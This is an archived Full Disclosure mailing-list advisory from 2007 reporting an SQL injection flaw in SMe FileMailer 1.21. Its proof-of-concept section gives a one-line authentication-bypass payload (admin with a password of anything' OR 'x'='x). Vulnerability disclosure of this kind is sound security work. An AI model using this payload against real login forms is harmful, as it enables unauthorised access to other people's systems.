Full Disclosure mailing list archives
[x0n3-h4ck] SMe FileMailer 1.21 Remote Sql Injection Exploit
From: <corrado.liotta () alice it>
Date: Tue, 16 Jan 2007 19:19:36 +0100
-=[--------------------ADVISORY-------------------]=- SmE FileMailer 1.21 Author: CorryL [corryl80 () gmail com] -=[-----------------------------------------------]=- -=[+] Application: SmE FileMailer -=[+] Version: 1.21 -=[+] Vendor's URL: http://www.scriptme.com/down/13 -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: sql injection -=[+] Exploitation: Remote -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.x0n3-h4ck.org -=[+] Virtual Office: http://www.kasamba.com/CorryL -=[+] Irc Chan: irc.darksin.net #x0n3-h4ck ..::[ Descriprion ]::.. SMe FileMailer lets you require visitors to submit their name and email address in order to retrieve a file from your site. Upon submitting the information, the link for file is sent to the visitor via email. This is a great way to stop leeching and third-party linking of your files, and it also lets you know exactly who's obtaining your files! ..::[ Proof Of Concept ]::.. In the login form insert Login: admin Password: anything' OR 'x'='x ..::[ Disclousure Timeline ]::.. [16/01/2007] - Public disclousure ************** Registrati ad Alice Basic e scarica Alice Messenger, il nuovo instant messenger che ti fa chattare GRATIS con i tuoi amici! Per maggiori informazioni vai su: http://adsl.alice.it/servizi/alicebasic.html?pmk=psmail_foot01
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [x0n3-h4ck] SMe FileMailer 1.21 Remote Sql Injection Exploit corrado.liotta (Jan 16)